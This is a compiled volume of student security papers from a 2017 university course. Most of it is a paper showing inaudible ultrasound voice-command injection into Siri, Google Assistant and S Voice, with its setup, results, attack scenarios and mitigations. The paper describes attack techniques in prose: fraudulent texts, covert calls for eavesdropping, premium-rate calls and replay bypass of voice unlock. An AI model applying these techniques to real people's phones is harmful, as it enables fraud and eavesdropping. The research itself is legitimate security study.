Professional Documents
Culture Documents
SCHOOL OF COMPUTING
CS3235 - Semester I,
2017-2018
Computer Security
intro 1
ii
intro 2
Table of Contents
Drone Hijacking. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Lim Shunyong, Ong Jing Yin,
Priit Rinken and Shee Zhi Xiang (Gp 2)
VideoCaptcha. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Ong Liwei, Lim Wei Jie, Marcus Ng Wen Jian,
Mooi Chung Yu Dexter and Low Bao Ling Vivian (Gp 5)
Home Security. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
Guo Jiaqi, Kowshik Sundararajan, Low Yong Siang,
Muhammad Mustaqiim Bin Muhar and Mun Le Yuan (Gp 8)
iii
intro 3
Exploiting DNS Protocol as a Covert Channel. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Amarparkash Singh Mavi, Chua Lin Jing, Chu Ying Yu,
Hou Ruomu and Joelle Lim Yan Yi (Gp 10)
Hacking Bluetooth. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Lim Yong Zhi, Leon Overweel,
Leow Wei Siang and Lau Wen Hao (Gp 11)
iv
intro 4
Indiscernible Voice Command Injection on Voice-
Controlled Systems in Smartphones
gp01
PDFsam_merge 1
5
of privilege escalation using VCSs, by unlocking a passcode- 2.1.2 Voice Command Recognition/Execution
locked smartphone using only voice commands. Once the VCS has been activated, the VCS would typically enter
Hence, this paper aims to further explore the feasibility of a state similar to a read-eval-print loop (REPL) found in some
mounting an indiscernible voice command injection attack on programming languages, most notably Lisp. That is, the VCS
three VCSs on smartphones, the extent of such attacks, as well as listens for voice commands, interprets and translates it into text
possible defences to mitigate them. using speech recognition, and then executes the command
accordingly, printing any output from the evaluation of the
2. VOICE-CONTROLLED SYSTEMS command on the screen, or in the case of VCSs, reading aloud the
2.1 Overview of VCSs in Smartphones VCS output via the smartphone’s speaker.
Using only the human voice, the user is able to perform tasks on Speech recognition (SR) enables software to recognise, interpret
smartphone without any physical interaction with the smartphone. and translate human voice into text. This is usually achieved by
For example, the user can simply call a person from his contact modelling the features of the input signal, as well as with respect
list with a voice command (e.g. “Call Tom”). to the target language to perform speech recognition in.
This process of controlling a smartphone using the human voice Techniques used in speech recognition traditionally used hidden
would require a VCS to bridge both the hardware aspects of Markov models (HMMs) [11], but newer deep learning
capturing and processing audio signals to recognise, capture and techniques such as long short-term memory (LSTM) recurrent
convert them into digital audio, as well as the software aspects of neural networks (RNNs) have also been recently used in Google’s
voice search capabilities [14].
translation into text using speech recognition and executing the
voice commands from there. Due to the high computational requirement of speech recognition
The typical workflow of smartphone VCSs is performed in two technology, especially for implementations that make use of deep
parts: the activation of the VCS, followed by executing of the learning algorithms, the task of speech recognition is usually
voice command. offloaded to a remote, powerful server. This means that VCSs can
function only when the smartphone has a connection to the
Smartphone VCSs can be activated either through physical Internet. The result is that VCSs may seem to take a few moments
interaction (e.g. long-press of the home button on an iPhone 6S), to “process” the user’s input, before returning the command or
or through voice activation using a wake command. We will only results that should be displayed or played back to the user.
be exploring voice activation in this paper, in order to explore the
possibility of performing a hands-free attack on smartphone 2.2 Analysis of Popular Smartphone VCSs
VCSs. The three most popular VCSs in smartphones today are Siri,
Google Assistant and S Voice, available on iOS, Android and
2.1.1 Voice Activation Samsung devices respectively. Each VCS has its own set of voice
The basis of voice activation is to allow a user to command his or commands, with some overlap in the set of voice commands
her smartphone to start listening for and executing voice between most smartphone VCSs.
commands on request. This is normally done through saying a
All VCSs explored are also not enabled on the smartphones by
wake command, such as “Hey Siri” on the iOS.
default, and require the owner to explicitly turn on the feature.
While speech recognition of voice commands is not performed in This will trigger a “training” process to register the owner’s voice
the background whilst the smartphone remains turned on, voice saying the wake command, before allowing the VCS to be used.
activation is typically available as an always-on feature. This
allows the user to activate the VCS at any time, even when the 2.2.1 Siri (iOS)
smartphone is in “sleep mode” (i.e. the screen is turned off). Siri is the VCS available on Apple’s iOS, the operating system for
its hardware, including iPhones and iPads, as well as other
Most smartphones come integrated with a separate, low-power operating systems developed by Apple, including macOS and
audio processor unit found on the smartphone’s integrated circuit tvOS. Siri has been included in iPhones from iOS 5 onwards.
(IC). For example, the Samsung Galaxy S7 uses the DBMD4
voice processor (part number D4A1A) solely for voice activation Siri can be activated either through a long-press of the iPhone’s
[6], which comes with a programmable software framework that home button, or through a wake command “Hey Siri”, if Allow
allows the operating system (OS) to communicate with it [5]. The Hey Siri is enabled in the Settings app. This will overlay the Siri
OS provides the VCS software access to this voice processor popup over the screen, which will then prompt the user for further
unit’s interface, in order to configure wake commands or other voice commands.
settings. The user must enable Siri through the Settings app, which will
In order to prevent misuse of the VCS, most smartphone VCSs prompt the user to say the following phrases in order to recognise
may also restrict the voice activation of the VCS to the owner of the owner’s voice:
the smartphone. The VCS may “train” itself by capturing and • “Hey Siri” (3 times)
saving the wake command as said by the target user, so as to • “Hey Siri, how’s the weather today?”
recognise and verify the identity of a user based on his voice used • “Hey Siri, it’s me.”
for voice activation.
Additionally, in order to activate Siri from the lock screen or
The saved voice model would then be used by the voice processor when the phone’s screen is off, the Access on Lock Screen setting
module to determine if the user is authorised to activate the VCS must be enabled. This will allow the user to activate Siri (opening
under certain circumstances. The conditions in which this the popup) without physical interaction with the phone’s
verification is enforced are variable; some VCSs may allow any touchscreen, even if the phone is secured with a passcode.
user to perform voice activation whilst the screen is on, while only
allowing the original user to perform voice activation whilst the
screen is off.
gp01
PDFsam_merge 2
6
Figure 1. Frequency domain plots of audio signals at various stages of the attack.
2.2.2 Google Assistant (Android) Roy et al. argued that, in theory, amplifiers should produce output
Google Assistant is the VCS available on most Android phones in signals linearly with respect to the input sound and gain [12].
the market. It was launched in May 2016, and superseded the However, acoustic amplifiers tend to exhibit nonlinearities with
functions of Google Now, the previous personal assistant on respect to gain at frequencies above 25 kHz.
Android phones launched in July 2012. Without going into the exact mathematical modelling of the
Google Assistant can be activated either by opening the Google signal, Roy et al. showed that at higher frequencies, an additional
app and tapping the microphone icon, or with a wake command “shadow” frequency may be generated after an input signal passes
“Ok Google”. This will overlay Google Assistant over the screen, through an amplifier, albeit at a lower level [12].
similar to that of Siri.
3.2 Exploiting Nonlinearity Effects
This wake command can be enabled through the Google app, By exploiting the nonlinearities that exist in actual hardware,
under Settings > Voice > ‘Ok Google’ Detection, and enabling Say including the amplifiers found in smartphones, we are able to
“Ok Google” any time. This will prompt the user to say “Ok design an attack to transmit audio signals which should be
Google” 3 times to train its voice model. indiscernible to the human ear, but yet will get recognised by
Additionally, in order to activate Google Assistant from the lock smartphones.
screen, the Trusted Voice setting must be enabled within the ‘Ok Zhang et al. showed that it is possible to make use of amplitude
Google’ Detection settings. This setting will unlock the phone if modulation (AM) to modulate the baseband (i.e. the target
the wake command matches the stored voice model, payload) on an ultrasound carrier (i.e. frequencies greater or equal
simultaneously activating Google Assistant to the foreground. to 20 kHz), which produces inaudible audio signals to the human
ear, but is recognised by the VCSs tested [17].
2.2.3 S Voice (Samsung Android)
S Voice is a VCS found exclusively on Samsung devices, and was As seen in Figure 1, by modulating an audible target audio signal
launched in May 2012. It is currently superseded by Bixby on on an ultrasound baseband, the resultant signal is beyond the
newer Samsung devices, such as the Samsung Galaxy S8, which upper limit of the human adult hearing range at 20 kHz. This
was launched in April 2017. signal can be transmitted via an ultrasound transducer (i.e.
speaker) to the victim’s smartphone. Nonlinearity effects
S Voice can be activated either by opening the S Voice app, or
exhibited by the amplifier embedded within the smartphone
with a wake command “Hi Galaxy”. It should be noted that out of
hardware cause “shadow frequencies” to “appear” below the 20
the other 2 VCSs, S Voice is a standalone app that does not make
kHz cut-off point. Once passed through the smartphone’s low-
use of the same overlay available to Google Assistant.
pass filter, these frequencies remain intact, which can be then
The user can enable S Voice by enabling the Voice wake up converted to digital signals and piped into software-defined
setting. This will prompt the user to say “Hi Galaxy” a few times speech recognition modules.
in order to train the voice model.
4. EXPERIMENTAL DESIGN
S Voice can be activated in the lock screen after enabling Voice
We performed an experiment to attempt the described attack using
wake up. However, if the smartphone is secured with a passcode,
only entry-level audio equipment on various smartphones, to
the Wake up in secured lock setting must also be enabled.
accomplish our two aims of this research. These two aims are to
3. ATTACK DESIGN evaluate the feasibility of such an attack, as well as to explore the
The basis of the attack is to design an audio signal that is different types of attacks through such an attack vector.
indiscernible to the human ear, but yet it can be captured and 4.1 Experimental Setup
recognised by VCSs.
The experimental setup involves the preparation of the modulated
3.1 Nonlinearity Effects signals through the use of software-defined radios (SDRs), the
Although audio hardware is designed to be linear with respect to audio equipment used to transmit and playback the sound, as well
input parameters, in reality they may exhibit nonlinearities. The as various smartphones with its VCS enabled and trained. A photo
audio hardware available on a smartphone may include a of the experimental setup can be seen in Figure 2.
microphone, (pre)-amplifier, low-pass filter (LPF) as well as an
audio-to-digital converter (ADC).
gp01
PDFsam_merge 3
7
4.1.1 Hardware Setup perform any actions on the VCS. The attacker is not able to have
The list of audio hardware that were used are as follows: physical interaction with the VCS, alter the settings of the VCS or
install any malicious software.
● Power amplifier: Topping TP20-MK2
● Audio interface (DAC): Onyx Blackjack However, the attacker is aware of the VCS being used based on
● Bookshelf speakers: Audio Image brand the smartphone’s characteristics. For example, if the smartphone
is an iPhone, the attacker can infer that the VCS most likely being
Various VCSs were also tested on the following smartphones: used is Siri.
● Google Assistant: Samsung Galaxy S7, Xiaomi Note 3 It is also assumed that the victim’s smartphone is locked (i.e. at
● iOS Siri: iPhone 5S, iPhone 6, iPhone 7 the time of attack, the phone is at the lock screen), although the
● Samsung S Voice: Samsung Galaxy S7 victim’s smartphone may or may not be secured with a passcode.
Since it was established that some voice commands require the
passcode to be entered (if secured), this factor must also be taken
4.1.2 Software Setup into account when assessing the effectiveness of the attack.
In order to execute the attack, an audio recording software was
Furthermore, it is also assumed that the attacker possesses the
used (e.g. Audacity) to record the voice commands and wake
necessary equipment such as those described above, in order to
commands using our voices. The audio was recorded using the in-
transmit the audio signals to the victim’s smartphone.
built microphone of a MacBook Pro.
Additionally, we used GNU Radio, a free software development 4.3 Audio Inputs
toolkit for radio and signal processing. This was used for We recorded various voice commands and wake commands using
modulating an input audio file onto a given carrier frequency, and our own voices for each of the three VCSs that were tested. These
sending the resultant signal to the audio hardware setup as voice recordings were then piped to the amplitude modulator
described above. The flow graph used in GNU Radio is shown in using GNU Radio, and played back using the audio setup.
Figure 3. The carrier frequency can be controlled in real-time during
playback in GNU Radio. We experimented with various carrier
frequencies centred around 20 kHz.
4.4 Methodology
To perform the attack, we first set up the various VCSs on the
target smartphones. We also recorded different wake commands
(e.g. “Hey Siri”, “Ok Google”) as well as voice commands (e.g.
“Call 12345678”, “Open WhatsApp”) using our own voices, and
subsequently modulated them using GNU Radio on an ultrasound
carrier. We tested different combinations for playback of these
signals to different VCSs, using the audio hardware setup as
described in subsection 4.1.1.
Firstly, in order to evaluate the feasibility of mounting such an
attack, we assessed the possibility of VCS activation using both
Figure 2. Experimental hardware setup for performing the the owner’s voice and a foreign voice.
attack.
In particular, we wanted to identify if using a foreign voice was
possible to activate the various VCSs, as well as whether it was
still possible after modulation, as it is more unlikely for the
attacker to be in possession of a recording with the owner saying
the wake command. Foreign voices can either be another person’s
voice (i.e. the voice of someone who did not train the VCS), or
one that is generated using text-to-speech (TTS) tools.
On top of trying out these commands to activate the various
VCSs, we also explored the feasibility of using foreign voices
within voice command speech recognition, once the VCS has
been activated.
Secondly, through some initial experimentation, we realised that
VCSs could be activated within the lock screen before the
smartphone was unlocked. We also found out that the set of voice
Figure 3. GNU Radio flow graph for amplitude modulation. commands that were available on VCSs when the smartphone was
locked was different from when the smartphone was unlocked.
In order to evaluate the attacks that are possible through the VCS
4.2 Threat Model as an attack vector, we explored what voice commands were
The attacker’s goal is to use indiscernible voice commands to allowed by the VCS depending on two different contexts:
activate the VCS without the victim’s knowledge. “locked” and “unlocked”. The “locked” context would refer to
scenarios where the smartphone is currently at the lock screen,
It is assumed that the attacker does not have direct access to the
protected with a passcode or some other mechanism, whilst the
victim’s smartphone, and is unable to interact with the owner to
“unlocked” context refers to scenarios where the smartphone is
gp01
PDFsam_merge 4
8
either within the home screen/within another application, or does different voice commands in both the “locked” and “unlocked”
not have any protection mechanisms such as passcodes in place. contexts.
We thus played back the modulated signals for both human voices Table 3. Speech recognition of modulated voice commands
and TTS-generated voices in these two different contexts, whilst once VCS is activated (in the “locked” context)
the VCS is already activated.
“Locked” Context
4.5 Experimental Results
Through our experiment, we were indeed able to play back the
Commands Siri Google S Voice
modulated voice signal through the hardware and software setup
Assistant
as described above, and the output was only slightly noticeable.
As we did not possess a sound level meter, we were unable to
measure the exact loudness of the resultant output signal. Make a phone call ✓ ✗ ✓
The following two tables show the experimental results of (“Call 9123-4567”)
performing both VCS activation and voice command speech
recognition. We explored using both owner’s voices and foreign Visit URL in browser ✗ ✗ ✗
voices for both scenarios. (“Open google.com”)
Modulated ✗ ✗ ✗
Foreign Voice Unlock phone ✗ ✓3 ✗
Table 2. Results of speech recognition of voice commands for Table 4. Speech recognition of modulated voice commands
various VCSs (once VCS is activated) once VCS is activated (in the “unlocked” context)
gp01
PDFsam_merge 5
9
to have unlimited access to all voice commands within Google
Open application ✓ ✓ ✓ Assistant.
(“Open WhatsApp”)
5. POSSIBLE ATTACKS
Send text message ✓ ✓ ✓ Since the ultrasound medium allows us to send voice commands
and wake commands covertly, we explore different attacks based
(“Message John”) on the level of “access” that an attacker has obtained.
This access level is directly correlated with whether the
Open email ✓ ✓ ✓ smartphone being attacked is secured with a passcode or not (i.e.
(“Open emails”) “locked” or “unlocked” contexts). Furthermore, if the attacker is
able to obtain a recording of the victim’s voice where he or she is
saying the wake command, this would expand the scope of the
types of attacks that are possible on the smartphone.
4.6 Discussion
It was mentioned that the modulated voice output signal was 5.1 Attacks in the “Locked” Context
slightly noticeable when played back through our hardware and The following sections explore possible attacks whilst the victim’s
software set up. Theoretically, since we are modulating the smartphone is locked with a passcode or some other lock
baseband signal on a carrier frequency at 20 kHz, which is outside mechanism via the OS.
of the adult human hearing range, we should in fact not be able to Since it was shown in Table 3 that Google Assistant explicitly
hear any sounds. requires the wake command with the owner’s voice to activate the
This could be because the audio hardware that was being used to VCS in the “locked” context, as well as the “Trusted Voice”
play back the modulated voice signals also exhibited setting enabled, we assume that Google Assistant is not vulnerable
nonlinearities. Therefore, the “shadow frequencies” at an audible whilst the smartphone is in the “locked” context.
frequency range had already existed within the playback system,
5.1.1 Spoofing/Impersonation
and were thus picked up by both the human ear and the VCSs,
VCSs Affected: Siri, S Voice
albeit at a low level.
In Table 3 above, we showed that it was possible to perform an
In the first part of the experiment where we explored using
indiscernible voice command injection to send messages within
different types of voices to activate various VCSs, we were
the “locked” context.
successful in utilising the modulated signal of the owner’s voice
to activate both Google Assistant and S Voice. However, we were One possible attack would be as follows: Suppose that Alice’s
unsuccessful in obtaining the same results for Siri using the same phone is being attacked, where the attacker injects a command
equipment. “Message Bob”, followed by “Please help me, I need $1000
urgently. Can you transfer it to my bank account 123-45678-9?”.
This discrepancy may have been due to various factors, such as
the quality of the equipment that was being used to playback the The attacker can impersonate Alice when communicating with her
signals to the smartphones, or different physical characteristics of contacts via text message (such as through SMS) without the
the embedded audio hardware inside of different smartphones. knowledge of Alice, possibly extracting critical data, information
or resources (in this case, it was money).
We also observed (non-empirically) that the Samsung Galaxy S7
tends to pick up the “shadow frequencies” the most often out of 5.1.2 Snooping/Interception
all the other phones tested. We managed to verify this by using VCSs Affected: Siri, S Voice
the in-built voice recorder application within the different
In Table 3 above, we showed that it was also possible to perform
smartphones tested to record the playback of the modulated voice
an indiscernible voice command injection to make calls to
signals, and indeed we managed to hear the original voice much
arbitrary numbers whilst in the “locked” context.
clearer in the Samsung Galaxy S7 as compared to the other
phones. One possible attack to snoop around the victim would be to inject
a voice command that makes a call to a number owned by the
Comparing Table 1 and Table 2, we found out that speech
attacker, such as “Call 9123 4567”.
recognition of voice commands was indeed less strict as compared
to speech recognition for VCS activation. There are various Without the victim’s knowledge, the attacker can eavesdrop on
measures in place to prevent a foreign voice from activating the the sounds around the victim, including his private conversations
VCS on both Google Assistant and S Voice, especially when the with others, as long as the call is still ongoing. The only trace that
phone is locked. This supports the idea that a separate speech this leaves behind is an entry in the call log, which might reveal
recognition system is used for voice commands versus activation. the attacker’s phone number.
Comparing Table 3 and Table 4, we found that the number of 5.1.3 Premium-Rate Phone Calls
commands available on a locked smartphone are indeed very VCSs Affected: Siri, S Voice
limited. All three VCSs similarly have various measures in place
Another rather niche type of attack would be to command
to prevent misuse of the VCS by unwanted parties. For example,
unsuspecting victim’s smartphones to make phone calls to
all three VCSs did not allow the user to view emails on the
premium-rate phone numbers, which could cost the victim up to
smartphone without first unlocking it.
£6.98 (USD $9.17) per minute in the United Kingdom (UK) [9],
However, Google Assistant provides a “Trusted Voice” feature, charged to his or her post-paid phone bill.
allowing owners to unlock their smartphone using their voice.
An attacker which owns a premium-rate number could potentially
This could essentially allow smartphones with this feature enabled
scam others out of their money without their knowledge through
such attacks.
gp01
PDFsam_merge 10
6
5.2 Attacks in the “Unlocked” Context An attacker could obtain an audio recording of the victim’s voice
There are many more attacks which can only be performed whilst when he is activating the VCS, and utilise the above techniques to
the victim’s smartphone is not secured with a passcode, or has covertly transmit the same audio recording through ultrasound
already been unlocked via different means. carriers, effectively bypassing the identity verification
mechanisms in the VCS.
In particular, Google Assistant’s “Trusted Voice” feature allows
the smartphone to be unlocked using the owner’s voice. We had This attack is especially devastating in Google Assistant with
shown that the modulated voice signal of the owner’s voice saying “Trusted Voice” enabled, since this would allow an attacker to
“Ok Google” was sufficient to unlock an Android phone from a bypass not just voice activation, but to also unlock the phone and
“locked” context. bypass the protection usually enforced by a passcode or
fingerprint.
5.2.1 Denial of Service (DoS)
VCSs Affected: Siri, Google Assistant, S Voice 5.3.2 Voice Synthesis
If the attacker is not able to obtain such a recording, another
There are multiple ways that a smartphone can be denied access possible way to bypass this restriction is to synthesise a voice
from legitimate parties, such as through turning the smartphone signal that says the wake command, using the same features as the
off, disabling incoming/outgoing calls and connections, or by owner’s voice.
utilising the compromised smartphone as an attack vector to
perform a DoS attack on another party. If attacker manages to obtain a sufficiently long recording of the
victim’s voice, the attacker can attempt to perform concatenative
For example, a command such as “Turn on airplane mode” could speech synthesis by first extracting out phonemes from a given
be used to disable the smartphone from communicating via audio signal, and recombining them to match the phonemes of the
cellular networks and/or wireless connections. This could be used desired text [3].
to prevent the victim from receiving push notifications from
remote servers without his/her knowledge whilst the attack is in The idea is to recombine the audio segments corresponding to the
progress, for example. phonemes into that of a wake command. For example, for the
wake command “Ok Google”, the IPA transcription would be
Another possible attack could be to launch a DoS attack on “oˈkeɪˈɡuːɡul”. We attempted to extract out segments of an audio
another smartphone using the victim’s smartphone, similar to how file that contained the relevant phonemes that could allow us to
compromised machines may be used in a botnet. If the attack can reconstruct a wake command for our purposes.
be carried out on a large scale, such that the modulated signals can
be broadcasted in a densely-populated area, this may cause many CMU Sphinx
VCSs in smartphones in the area to be activated, launching a We attempted to perform automatic concatenative speech
large-scale DDoS attack by commanding these VCSs to send a synthesis by first making use of a phonetic library PocketSphinx
text message to a single phone number to overload the target’s from the CMU Sphinx project, to convert an input audio signal
inbox, for example. into phonemes [2]. We were successful in identifying the
Lastly, another trivial type of DoS attack would be to drain phonemes (with some degree of accuracy) from a given input
resources from the victim’s smartphone. For example, repeated audio file. Figure 4 below shows some sample output from using
activation of the VCS without the victim’s knowledge may drain PocketSphinx’s command-line interface to transcribe an audio file
the battery of the smartphone quicker than normal. This can be of one of our voices saying “Ok Google”.
achieved in the “locked” context as well.
5.2.2 Drive-By Download
VCSs Affected: Siri, Google Assistant, S Voice
By making use of voice commands to visit a URL, it could be
possible to execute a drive-by download of malware on the
target’s smartphone. The malicious software, once installed on the
smartphone, could then be used by the attacker to remotely access
and control the smartphone for further exploitation.
5.3 Bypassing VCS Voice Activation
Since the success of VCS voice activation is dependent on the
identity of the user who says the wake command, the described
attacks may only work in specific scenarios, if the attacker is able
to activate the VCS in the first place.
The following attacks show possible ways to bypass this
restriction.
5.3.1 Replay Attacks Figure 4. Using PocketSphinx to convert an input audio file to
VCSs Affected: Siri, Google Assistant, S Voice phonemes (in ARPAbet format).
The use of a voice signal as an identity verification mechanism is The start and end times of the each of the identified phonemes
convenient, but is not without its faults. It is inherently prone to corresponding to the audio file are displayed in the output, which
replay attacks since the wake command remains identical across could allow us to write a script to extract out the relevant parts of
different activations of the VCS. the audio file respectively.
gp01
PDFsam_merge 11
7
However, we were unsuccessful in using a synthesised voice This means that an attacker who does not know the victim’s
audio file to activate the VCS, through both normal, audible custom wake command will also not be able to activate the VCS.
playback as well as through modulated playback. However, such an approach is only security through obscurity,
Voice Synthesis Services and anyone who previously had knowledge of the custom wake
command (such as being in the vicinity while the victim uses the
We also tried out Lyrebird, a cloud-based service (currently still wake command) will still be able to perform a replay attack.
in beta) that uses deep learning methods to similarly synthesise
voice, using uploaded file samples of the person’s voice [8]. Finally, some third-party mobile app vendors are also looking to
However, we discovered that the success rate of such an approach integrate their services into VCSs for greater convenience for
is extremely low, and also requires a large amount of speech users. For example, the Oversea-Chinese Banking Corporation
samples of the victim’s voice. (OCBC), a large financial institution within many markets in East
Asia, allows users to make fund transfers using voice commands
Adobe Voco is also another software that aims to achieves the in Siri, integrated through its mobile application [16]. Considering
same purpose, and is known as being the “Photoshop for the the high risk involved in exposing financial actions on the VCS,
voice”, purportedly allowing easy manipulation of the human users should also take caution before enabling such features on
voice within audio files [1]. It is still yet to be officially released, their smartphone as well.
and requires approximately 20 minutes of sample speech files of
the target user to be effective. 7. CONCLUSION
In this paper, we showed that it was indeed possible to inject
We believe that with the development of deep learning techniques
indiscernible voice commands into three of the most popular
such as generative adversarial networks (GANs), voice synthesis
smartphone VCSs (Google Assistant, Siri and S Voice), using
is an increasingly possible and realistic attack in the near future
only entry-level audio equipment. This allows an attacker to take
requiring significantly lesser samples. For example, WaveNet by
over control of the device through various means, possibly
Google Deepmind is a generative model which aims to synthesise
employing several types of attacks such as denial-of-service or
speech from text, mimicking the human voice much closer than
drive-by downloads.
existing text-to-speech (TTS) systems [17].
With the widespread use of VCSs around the world not only in
6. MITIGATIONS smartphones, but also in smart home devices such as Amazon
Current VCSs explored have shown to have some existing Echo (Alexa) and Google Home (Google Voice), this
security mechanisms in place. For example, if the smartphone is vulnerability may seem to be serious indeed.
locked with a passcode, all VCSs do not allow access to data that
is otherwise only accessible after entering the passcode. However, the success rates of such attacks are largely dependent
Furthermore, it was also shown that Google Assistant and S Voice on the surrounding background noise level, as well as whether the
restrict the VCS to be activated on the lock screen via voice victim’s phone is open to voice activation without his/her
activation only if it matches the stored voice model. knowledge in the first place.
However, all VCSs are still susceptible to replay attacks on voice Such attacks may be made more possible in the near future,
activation. This allows an attacker to replay a recorded signal of through the development of various voice synthesis tools and deep
the owner’s voice saying the wake command to the smartphone, learning techniques. It is best that greater awareness of such
which can then activate the VCS. vulnerabilities in VCSs are made known early, and users of VCSs
should employ the relevant security practices to prevent
To prevent any of such attacks, the best recommendation would unauthorised use of their smartphone through a combination of
be to disable voice activation on the VCS, which would help users passcodes, limiting voice activation, and/or customising their
ensure that attackers will not be successful in performing an attack VCS wake command, if possible.
since they are not able to activate the VCS. However, this may be
a major inconvenience to users who are already accustomed to 8. ACKNOWLEDGEMENTS
using their VCS via voice activation. We would like to show our appreciation to Professor Hugh
Anderson from the National University of Singapore for giving us
Alternatively, another option would be to enforce a passcode on
the opportunity to explore the given topic and for his valuable
the smartphone. This would severely limit the capabilities of the
insights and help throughout the course of this project.
VCS whilst it is locked. Since the attack is most likely to take
place whilst the victim is not looking at his or her phone, users 9. REFERENCES
should always lock their phones before putting it away. [1] Anon. 2016. Adobe Voco 'Photoshop-for-voice' causes
Some VCSs like Google Assistant also offer customisable settings concern. BBC (November 2016). Retrieved November 16,
that could bypass these restrictions. For example, the “Trusted 2017 from http://www.bbc.com/news/technology-37899902.
Voice” setting allows an attacker to execute a replay attack to [2] Anon. 2017. Building an application with PocketSphinx.
completely bypass any security mechanism on the phone. We CMUSphinx. Retrieved November 16, 2017 from
strongly recommend that this option should not be enabled. https://cmusphinx.github.io/wiki/tutorialpocketsphinx/.
VCS providers are also looking into additional security [3] Conkie, A. Method and system for performing concatenative
mechanisms to prevent unauthorised use of VCSs. For example, S speech synthesis using half-phonemes. Jan. 9, 2001.
Voice allows the user to customise the wake command from the
default “Hi Galaxy”. Apple has also started to develop this in [4] Diao, W., Liu, X., Zhou, Z. and Zhang, K. 2014. Your voice
2017, and will be looking to incorporate custom commands into assistant is mine: How to abuse speakers to steal information
Siri, along with the owner’s unique voice model, as a form of and control your phone. In Proceedings of the 4th ACM
voice biometric for authentication in the future [10]. Workshop on Security and Privacy in Smartphones & Mobile
Devices (Scottsdale, USA, November 03 - 07, 2014).
gp01
PDFsam_merge 12
8
CCS'14. ACM, New York, NY, 63-74. DOI= Retrieved November 16, 2017 from
http://dx.doi.org/10.1145/2666620.2666623. https://deepmind.com/blog/wavenet-generative-model-raw-
[5] DSP Group. 2016. DBMD4 Part Number D4A1A. Data Brief. audio/.
Retrieved November 15, 2017 from [18] Zhang, G., Yan, C., Ji, X., Zhang, T., Zhang, T. and Xu, W.
https://www.dspg.com/wp-content/uploads/DBMD4-Part- 2017. DolphinAttack: Inaudible voice commands. In
Number-D4A1A-Data-Brief-.pdf. Proceedings of the 2017 ACM SIGSAC Conference on
[6] iFixit. 2016. Samsung Galaxy S7 teardown. iFixit. Retrieved Computer and Communications Security (Dallas, USA,
November 15, 2017 from October 30 - November 03, 2017). CCS'17. ACM, New
https://www.ifixit.com/Teardown/Samsung+Galaxy+S7+Tea York, NY, 103-117. DOI=
rdown/56686. https://doi.org/10.1145/3133956.3134052.
[7] Liu, C., Bendtsen, C., Johnson, M., McCarthy, A., Orozco,
O., Peart, M., Shum, S., Utreras, M. and Wang, H. 2015.
Worldwide Internet and mobile users. Retrieved November
15, 2017 from
https://insights.ap.org/uploads/images/eMarketer_Estimates_
2015.pdf.
[8] Lyrebird. 2017. Lyrebird. Retrieved November 16, 2017
from https://lyrebird.ai/.
[9] Ofcom. 2017. Call charges and phone numbers. GOV.UK.
Retrieved November 15, 2017 from https://www.gov.uk/call-
charges.
[10] Purcher, J. 2017. Apple patent reveals a new security feature
coming to Siri. Patently Apple. Retrieved November 17,
2017 from http://www.patentlyapple.com/patently-
apple/2017/04/apple-patent-reveals-a-new-security-feature-
coming-to-siri.html.
[11] Rabiner, L. 1989. A tutorial on hidden Markov models and
selected applications in speech recognition. Proceedings of
the IEEE. 77, 2 (Feb. 1989), 257–286. DOI=
https://doi.org/10.1109/5.18626.
[12] Roy, N., Hassanieh, H. and Choudhury, R. R. 2017.
BackDoor: Making microphones hear inaudible sounds. In
Proceedings of the 15th Annual International Conference on
Mobile Systems, Applications, and Services (Niagara Falls,
USA, June 23 - 23, 2017). MobiSys'17. ACM, New York,
NY, 2-14. DOI= https://doi.org/10.1145/3081333.3081366.
[13] Saito, Y., Takamichi, S. and Saruwatari, H. 2017. Statistical
parametric speech synthesis incorporating generative
adversarial networks. IEEE/ACM Transactions on Audio,
Speech, and Language Processing. PP, 99 (Oct. 2017), 1–1.
DOI= https://doi.org/10.1109/taslp.2017.2761547.
[14] Sak, H.C.F., Senior, A., Rao, K., Beaufays , F., and
Schalkwyk, J. 2015. Google voice search: faster and more
accurate. Google Research Blog. Retrieved November 16,
2017 from https://research.googleblog.com/2015/09/google-
voice-search-faster-and-more.html.
[15] Tamura, M., Mizutani, T., and Kagoshima, T. 2007. Fast
concatenative speech synthesis using pre-fused speech units
based on the plural unit selection and fusion method. IEICE
Transactions on Information and Systems. E90-D, 2 (Feb.
2007), 544–553. DOI= https://doi.org/10.1093/ietisy/e90-
d.2.544.
[16] Tham, I. 2017. OCBC SME customers can get Siri to
activate fund transfers, check balances. The Straits Times.
Retrieved November 17, 2017 from
http://www.straitstimes.com/singapore/ocbc-sme-customers-
can-get-siri-to-activate-fund-transfers-balance-checks.
[17] van den Oord, A., Dieleman, S. and Zen, H. 2016. WaveNet:
a generative model for raw audio. Google Deepmind.
gp01
PDFsam_merge 13
9
PDFsam_merge 14
Drone Hijacking
Lim Shunyong Ong Jing Yin Priit Rinken
National University of Singapore National University of Singapore National University of Singapore
21 Lower Kent Ridge Rd 21 Lower Kent Ridge Rd 21 Lower Kent Ridge Rd
Singapore 119077 Singapore 119077 Singapore 119077
+65 9088 7502 +65 9185 7827 +65 8262 9811
lim.shunyong@u.nus.edu ongjingyin@u.nus.edu e0216326@u.nus.edu
Shee Zhi Xiang
National University of Singapore
21 Lower Kent Ridge Rd
Singapore 119077
+65 9624 7327
a0124209@u.nus.edu
ABSTRACT or an expensive Aerialtronics Altura Zenith Law Enforcement
In this paper, we will be analysing the WiFi communications of Drone, attacks such hijacking or GPS spoofing have been
commercial drones and the security risks exposed by the successfully executed [6]. It is rather alarming how insecure some
implementations. Our analysis is conducted via packet sniffing of of the drones can be. As drones increasingly gain popularity in the
the communications between the drone and its client device. mass consumer market, these insecurities in drones pose a real
Based on our findings for drones JJRC H37 Elfie and DJI Mavic threat, be it for the owners or people within the vicinity of the
Pro, we will identify possible attacks that can be made. drone. To demonstrate the security of consumer drones, we will
be identifying vulnerabilities of the DJI Mavic Pro and the JJRC
Categories and Subject Descriptors Elfie H37, as well as how these vulnerabilities can be exploited by
B.4.1 [Input/Output and Data Communications]: Data an attacker to hijack control of these drones.
Communication Devices.
gp02
